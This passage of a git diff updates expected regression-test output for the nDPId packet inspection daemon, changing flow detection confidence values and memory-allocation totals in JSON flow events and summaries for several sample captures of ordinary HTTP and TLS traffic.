+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385129508,"flow_last_seen":1654385129813,"flow_idle_time":7580000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":627,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1654385184927,"flow_last_seen":1654385185032,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":8568,"flow_tot_l4_payload_len":239007,"flow_avg_l4_payload_len":3918,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1654385136207,"flow_last_seen":1654385137795,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":179965,"flow_avg_l4_payload_len":5141,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1654385136206,"flow_last_seen":1654385180918,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":23040,"flow_tot_l4_payload_len":523278,"flow_avg_l4_payload_len":6381,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385127244,"flow_last_seen":1654385127425,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1654385229374,"flow_last_seen":1654385236412,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8604,"flow_avg_l4_payload_len":537,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1654385136215,"flow_last_seen":1654385137803,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":264022,"flow_avg_l4_payload_len":7333,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385128878,"flow_last_seen":1654385130178,"flow_idle_time":7580000,"flow_min_l4_payload_len":496,"flow_max_l4_payload_len":2746,"flow_tot_l4_payload_len":4982,"flow_avg_l4_payload_len":1245,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1654385136216,"flow_last_seen":1654385137795,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":37440,"flow_tot_l4_payload_len":124465,"flow_avg_l4_payload_len":8890,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385128878,"flow_last_seen":1654385129190,"flow_idle_time":7580000,"flow_min_l4_payload_len":817,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":1688,"flow_avg_l4_payload_len":844,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385129449,"flow_last_seen":1654385129804,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":1181,"flow_avg_l4_payload_len":590,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":80,"flow_first_seen":1654385140171,"flow_last_seen":1654385145302,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":8640,"flow_tot_l4_payload_len":177845,"flow_avg_l4_payload_len":2223,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385139579,"flow_last_seen":1654385139941,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1384,"flow_avg_l4_payload_len":692,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","packets-captured":2549,"packets-processed":2549,"total-skipped-flows":0,"total-l4-payload-len":4952452,"total-not-detected-flows":14,"total-guessed-flows":6,"total-detected-flows":177,"total-detection-updates":20,"total-updates":0,"current-active-flows":0,"total-active-flows":197,"total-idle-flows":197,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1081,"global_ts_msec":1654385236487} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2549/2549 ~~ skipped flows.............: 0 @@ -1089,9 +1087,9 @@ ~~ total active/idle flows...: 197/197 ~~ total timeout flows.......: 20 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6244637 bytes -~~ total memory freed........: 6244637 bytes -~~ total allocations/frees...: 121628/121628 +~~ total memory allocated....: 6328006 bytes +~~ total memory freed........: 6328006 bytes +~~ total allocations/frees...: 124379/124379 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 384 chars ~~ json string max len.......: 15998 chars diff --git a/test/results/443-chrome.pcap.out b/test/results/443-chrome.pcap.out index 66a408e90..9565f9e9a 100644 --- a/test/results/443-chrome.pcap.out +++ b/test/results/443-chrome.pcap.out @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871520 bytes -~~ total memory freed........: 5871520 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6005154 bytes +~~ total memory freed........: 6005154 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 2429 chars diff --git a/test/results/443-curl.pcap.out b/test/results/443-curl.pcap.out index aa04303c4..9e6549ebf 100644 --- a/test/results/443-curl.pcap.out +++ b/test/results/443-curl.pcap.out @@ -4,10 +4,10 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","packets-captured":109,"packets-processed":109,"total-skipped-flows":0,"total-l4-payload-len":66816,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113121570} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 109/109 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877520 bytes -~~ total memory freed........: 5877520 bytes -~~ total allocations/frees...: 118229/118229 +~~ total memory allocated....: 6011154 bytes +~~ total memory freed........: 6011154 bytes +~~ total allocations/frees...: 120991/120991 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 1104 chars diff --git a/test/results/443-firefox.pcap.out b/test/results/443-firefox.pcap.out index a2a7b26a1..d550510f3 100644 --- a/test/results/443-firefox.pcap.out +++ b/test/results/443-firefox.pcap.out @@ -4,10 +4,10 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 